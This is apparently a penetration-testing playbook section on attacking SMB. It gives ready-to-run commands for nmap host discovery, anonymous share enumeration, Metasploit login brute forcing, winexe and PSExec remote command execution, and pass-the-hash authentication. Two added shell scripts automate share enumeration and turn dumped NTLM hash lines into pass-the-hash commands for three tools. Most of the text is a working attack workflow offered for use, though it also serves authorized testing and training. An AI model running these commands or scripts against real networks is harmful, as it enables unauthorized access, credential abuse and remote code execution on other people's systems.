Offensive Playbook

SMB

Nmap discovery

Nmap identifies hosts with the SMB port (TCP 445) open; the smb-protocols script additionally reports which SMB dialects (SMBv1, 2.x, 3.x) each server accepts, which is what tells you whether a host still speaks SMBv1

nmap -p 445 10.10.5.0/24
nmap -p 445 --script=smb-protocols 10.10.5.0/24

Mount a shared folder

mount -t cifs //x.x.x.x/share /mnt/share
# Credentials on the command line end up in shell history and in the process list; mount.cifs also accepts a credentials file
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Brute force login with Metasploit

module: auxiliary/scanner/smb/smb_login

The following methods attempt a null session (anonymous login) and require no username or password. Many hardened hosts refuse null sessions, so an empty result is not proof that no shares exist

enum4linux 10.10.5.15


crackmapexec smb <IP> -u '' -p '' --shares


# list the shares (without -N you are prompted for a password; press Enter for a null session)
smbclient -L \\\\10.10.15.5
smbclient -N -L \\\\10.10.15.5

# browse the shares
smbclient \\\\10.10.15.5\\share_name
smbclient -N \\\\10.10.15.5\\share_name


smbmap -H <IP> [-P <PORT>]
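The two steps above (find hosts with 445 open, then list what a null session can see) are usually glued together in a loop. The following script is an added example, not part of the original playbook: it parses nmap's grepable output to pick out hosts with 445/tcp open and extracts the Disk shares from smbclient -L output, skipping the administrative shares that a null session cannot read. Both inputs are constructed samples embedded in the script so it runs offline; the comments show the live commands that produce them.

```shell
#!/bin/sh
# Added example (not from the original playbook): glue the nmap sweep to
# null-session share enumeration. The sample outputs below are constructed
# so the script runs offline; replace them with live command output.

# Constructed sample of:  nmap -p 445 --open -oG - 10.10.5.0/24
NMAP_GREPABLE='# Nmap 7.94 scan initiated
Host: 10.10.5.10 ()   Ports: 445/open/tcp//microsoft-ds///
Host: 10.10.5.15 ()   Ports: 445/open/tcp//microsoft-ds///
Host: 10.10.5.20 ()   Ports: 445/filtered/tcp//microsoft-ds///
# Nmap done'

# Constructed sample of:  smbclient -N -L //10.10.5.15
SMBCLIENT_LIST='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        backups         Disk      Nightly backups
        public          Disk
Reconnecting with SMB1 for workgroup listing.
'

# Print the hosts whose 445/tcp is open, one per line.
# In grepable output the second field of a "Host:" line is the address.
hosts_with_smb() {
    printf '%s\n' "$1" | awk '/^Host:/ && /445\/open\/tcp/ { print $2 }'
}

# Print the Disk shares from smbclient -L output, skipping the
# administrative shares (names ending in $) that a null session cannot read.
disk_shares() {
    printf '%s\n' "$1" | awk '$2 == "Disk" && $1 !~ /\$$/ { print $1 }'
}

# Driver: pair every discovered host with its readable-looking shares and
# print the smbclient command that would browse each one anonymously.
# Live use: replace "$SMBCLIENT_LIST" with "$(smbclient -N -L "//$host")".
enumerate() {
    for host in $(hosts_with_smb "$NMAP_GREPABLE"); do
        for share in $(disk_shares "$SMBCLIENT_LIST"); do
            printf "smbclient -N '//%s/%s' -c ls\n" "$host" "$share"
        done
    done
}

enumerate
```

Only hosts whose 445/tcp is reported as open are kept; a filtered port (10.10.5.20 in the sample) is dropped rather than probed. The share filter keeps Disk shares only, so IPC$ and the printer-style entries never reach the browse step.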

The following methods require a username and password

winexe

This method gives remote command execution over SMB; the account must have local administrator rights on the target, because winexe installs a temporary service there

winexe -U administrator%alice_123321 //10.4.16.28 'whoami'

These methods will enumerate shares


# If you omit the password you are prompted for it. With --pw-nt-hash, the password given is the NT hash
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP>

# Password, or pass-the-hash with the NT hash (-H also accepts LM:NT)
crackmapexec smb <IP> -u 'username' -p 'password' --shares
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares

smbmap -u "username" -p "password" -H <IP> [-P <PORT>] # Creds
smbmap -u "username" -p "<LM>:<NT>" -H <IP> [-P <PORT>] # Pass-the-Hash (LM:NT order; use the empty LM hash aad3b435b51404eeaad3b435b51404ee when only the NT hash is known)
# Listing with smbmap: without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-recursive list
smbmap -u "username" -p "<LM>:<NT>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # Pass-the-Hash
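The three tools above take a dumped NTLM hash in three different shapes: smbclient wants the NT hash alone behind --pw-nt-hash, crackmapexec's -H takes the NT hash (or LM:NT), and smbmap's -p wants LM:NT. The script below is an added example, not part of the original playbook: it splits a secretsdump-style user:rid:LM:NT::: line, sanity-checks the hash fields, and builds the matching argument for each tool. The hash line is constructed (the well-known empty LM hash and the NT hash of an empty password); the user name and target IP are placeholders.

```shell
#!/bin/sh
# Added example (not from the original playbook): turn one dumped NTLM hash
# line into the argument each share-enumeration tool expects.
# HASH_LINE is constructed: empty LM hash, NT hash of an empty password.
HASH_LINE='alice:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# Field accessors for the user:rid:LM:NT::: format
user_of() { printf '%s\n' "$1" | cut -d: -f1; }
lm_hash() { printf '%s\n' "$1" | cut -d: -f3; }
nt_hash() { printf '%s\n' "$1" | cut -d: -f4; }

# An NTLM hash is exactly 32 hex characters; anything else is a parsing error,
# not a credential, and must not be sprayed at targets.
valid_hash() { printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'; }

# smbclient: user%NT with --pw-nt-hash (NT hash alone)
smbclient_cmd() {
    printf "smbclient -U '%s%%%s' --pw-nt-hash -L //%s\n" \
        "$(user_of "$1")" "$(nt_hash "$1")" "$2"
}

# crackmapexec: -H takes the NT hash
cme_cmd() {
    printf "crackmapexec smb %s -u '%s' -H '%s' --shares\n" \
        "$2" "$(user_of "$1")" "$(nt_hash "$1")"
}

# smbmap: -p takes LM:NT, in that order
smbmap_cmd() {
    printf "smbmap -u '%s' -p '%s:%s' -H %s\n" \
        "$(user_of "$1")" "$(lm_hash "$1")" "$(nt_hash "$1")" "$2"
}

# Build all three commands for one target, refusing malformed hashes.
pth_commands() {
    valid_hash "$(lm_hash "$1")" || { echo "bad LM hash" >&2; return 1; }
    valid_hash "$(nt_hash "$1")" || { echo "bad NT hash" >&2; return 1; }
    smbclient_cmd "$1" "$2"
    cme_cmd "$1" "$2"
    smbmap_cmd "$1" "$2"
}

pth_commands "$HASH_LINE" 10.10.5.15
```

The length check matters in practice: a dump line with a truncated or wrapped hash field produces commands that look right, fail authentication everywhere, and can lock the account out.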

PSExec

PSExec with Metasploit

module: exploit/windows/smb/psexec